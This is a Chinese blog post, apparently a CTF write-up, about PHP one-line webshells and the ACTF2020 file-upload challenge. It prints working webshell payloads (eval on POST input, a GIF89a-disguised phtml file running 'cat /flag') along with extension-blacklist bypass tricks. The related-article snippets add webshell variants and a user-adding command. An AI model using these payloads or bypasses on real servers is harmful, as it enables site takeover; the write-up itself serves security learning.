Web-一句话木马php

已于 2022-05-04 11:36:22 修改
阅读量5.5k 收藏 15
点赞数 1
分类专栏: CTF 文章标签: php
于 2021-05-05 14:01:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46685211/article/details/116422175
版权

文章目录

前言

在BUU CTF做到一道题,[ACTF2020 新生赛]Upload 1。要求upload,这个时候应该想到是一句话木马的题目。在攻防世界的web新手区中webshell也是一个一句话木马的题目。

一、什么是webshell

webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。
web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。

二、一句话木马

1.基本原理

利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国蚁剑获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。

<?php @eval($_POST['cmd']); ?>

**原理理解:**相当于为中国蚁剑创建一个可以不断访问网站的门,蚁剑可以通过这个密码‘cmd’,传递一些可以为eval执行的字符串代码,最终呈现的效果就是我们可以管理整个网站的文件。(这个密码不是正经密码,而是内置的一个参数名称,通过蚁剑可以利用这个参数名称上传指定参数,包括可执行的语句)

2.上传文件到网站流程

参考:https://blog.csdn.net/qq_43236906/article/details/109263653
重点是一个用于管理上传文件的php文档。
在这里插入图片描述
一般在这里会有对上传文件类型的过滤,这段代码中上传文件重复会返回提示,储存地址为添加了upload的路径,即upload的文件夹。
这段代码暴露了上传文件储存的地址,就可采用蚁剑不断的访问这个文件,想网站提交数据。在这里插入图片描述

3.语句解析

<?php @eval($_POST['cmd']); ?>

(1)@表示后续语句执行时不报错,否则因为变量没有定义会宝座
(2)$_POST[‘cmd’]表示cmd这个变量使用post的方式接收。(在firefox中使用hack的postdata选项传递数据。

post与get的数据提交方式是不同的。传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=2)
(3)eval()语句是将字符串当成代码执行,这样通过cmd上传的字符串就可以执行,蚁剑就是通过这个门对网站的权限进行获取。

4.入侵条件

木马入侵成功条件
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。

一般来说,题目明确让你上传文件肯定就是上传一句话木马的文件,但是一般会与类型筛选的问题。或者是直接把后门给你,比如说攻防世界的webshell题目。或者是允许你更改网站的某个asp/aspx/php文件。
绕过类型筛选就是为了能够成功上传木马。
除此之外还需要知道文件被上传到哪里去了,参考本段点2.中国蚁剑的URL得知是该有木马的文件所在绝对地址。

三、图片马

将一句话木马加载到图片最后,构造图片马。
在这里插入图片描述
这个时候一句话木马存在于图片txt文档最后。但是图片马并不能直接与蚁剑连接,因为图片在网站中的解析格式不是php,蚁剑不能通过这个后门干坏事。
需要使用文件包含漏洞(暂时没时间学了)

四、[ACTF2020 新生赛]Upload

1.思路

首先发现一个上传文件的地方,很明显是上传木马。
随便上传一个文件上去,发现报错要求上传文件的后缀符合要求。

方法一 修改报文

抓包更改文件传入数据的文件类型。用于绕过前端验证。这种方法后续继续学习。

方法二 文件名构造

查看网站源代码,发现前端有一个文件筛查函数。(表征还可以是上传错误后缀的文件bp根本抓不到包)
在这里插入图片描述

在html文件中把该函数的调用删掉就可以上传不是图片类型的文件了。
然后可以尝试上传一个php文件,发现还是不行。说明后端也有筛选机制存在。
php常见后缀绕过,文件包含漏洞(绕过姿势)
文件后缀名绕过
前提:黑名单校验
黑名单检测:一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件。
绕过方法:
(1)找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
(2)可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表(记得在蚁剑中选择):
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

1、文件构造

本题可以直接构造一个phtml文件,里面包含

GIF89a  
<script language='php'>@eval($_POST['ye']);</script>
<script language='php'>system('cat /flag');</script>

看上去是一个html的文件类型,这个也先挖个坑吧。第二句让flag直接回显。

2、抓包改文件类型

首先还是先把前端的审查函数给删了,直接传一个php文件上去,抓包。
在这里插入图片描述
修改文件类型为phtml,上传成功。然后用蚁剑连一连就可以找到flag。
至于使用哪一种后缀进行绕过需要尝试,毕竟没有上帝视角。蚁剑里看到
在这里插入图片描述
常用的绕过后缀被禁了一大半。
在这里插入图片描述
最后找到。

参考

Web安全-一句话木马
WEB32:文件上传 (一句话木马,以及工具中国蚁剑用法)

Oooption
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP一句话木马浅析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-28 1345
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。PHP一句话木马的原理是利用了PHP中的eval()。 一句话木马的原理是利用了PHP中的eval()。 注:eval因为是一个语言构造器而不是一个函数,不能被可变函数调用。
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
2024年最全网络安全-webshell详解(原理、攻击、检测与防御)
最新发布
2301_82242964的博客
05-03 918
利用文件上传漏洞、SQL注入漏洞、RCE漏洞等,将恶意文件放到web服务器中,也就是常说的”后门”,之后可以进行文件管理、数据库管理、远程命令执行、提权等恶意操作。总结:攻击层面还应考虑如何绕过系统上传webshell,如何隐藏webshell免查杀,防御方面应该考虑如何避免webshell被上传,如何查杀webshell。例如,文件上传漏洞中,将php代码放到jpg文件中,可以使用@运算符,以防发生任何错误。首先,利用文件上传漏洞,上传webshell文件。至此,可以进行文件管理,虚拟终端等。
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
文件上传一句话木马getshell
qq_41620273的博客
12-25 5500
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
php exec回显_木马小工具(php版)——网页操控肉鸡服务器
weixin_39620197的博客
12-21 506
如何通过一个文本文件的网页来控制服务器呢?在服务器上执行命令在网页上返回执行结果使用思路基于web的木马上传到靶机的apache服务器中通过web访问将命令传给木马木马接收命令在服务器端执行将执行结果(服务器的信息)返回到web页面上使用的php函数php执行shell/cmd命令,可以使用下面几个函数: stringsystem(string$command[,int&...
一句话的艺术-web提权.pdf
01-25
一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
PHP 木马攻击防御技巧
12-18
比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache /htdocs 这样,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,...
ACCESS导一句话webshell1
08-08
接着,向表"a"的"a"字段插入一句话木马,这里使用的是请求变量(#)执行代码: ```sql insert into a (a) values('(chr(35))%>') ``` 2. **导出为Excel文件**: 将表"a"的内容导出为一个Excel文件,利用以下SQL...
PHP实现webshell扫描文件木马的方法
01-20
支持扫描callback一句话shell 支持各种php大马 <!DOCTYPE html> <html> <head> <meta charset='gb2312'> <title>PHP web shell scan</title> </head> <body> </...
CtfHub-wp(web
01-23
文件上传漏洞允许我们上传PHP一句话木马,通过前端验证的绕过(例如在Firefox中禁用前端代码),或者利用`.htaccess`文件实现文件解析漏洞,将木马文件以非正常扩展名上传。 `.htaccess`文件是Apache服务器上的一个...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话webshell,然后用菜刀连接即可
php webshell 下载(目前功能强大齐全的phpwebshell
11-09
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,好不容易找到这功能齐全的php版的webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
phpwebshell
06-08
不错的webshell,希望能有帮助到你!
你真的了解一句话木马吗?
Elite的博客
04-14 1万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 1570
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
利用WebShellShell技巧
悦分享
08-01 1900
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
萌新之php一句话木马(上传漏洞)
weixin_45805993的博客
11-09 1万+
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html https://xz.aliyun.com/t/2435 https://blog.csdn.net/momo_sleet/article/details/82497520 0x01 什么是一句话木马 <?php @eval($_POST['hacker']); ?> 如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
php后门拿下当前目录
aici0819的博客
03-26 369
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHPwebshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
SSID blacklist
08-16
抱歉,我无法提供关于SSID黑名单的具体信息。SSID(Service Set Identifier)是用于识别无线网络的名称,黑名单则是指被禁止或限制使用的列表。黑名单可能是由网络管理员或设备制造商维护的,目的是限制某些无线网络的访问或防止潜在的安全威胁。具体的SSID黑名单可能因地区、组织或网络配置而异。如果您有特定的问题或需求,请提供更多细节,我将尽力帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值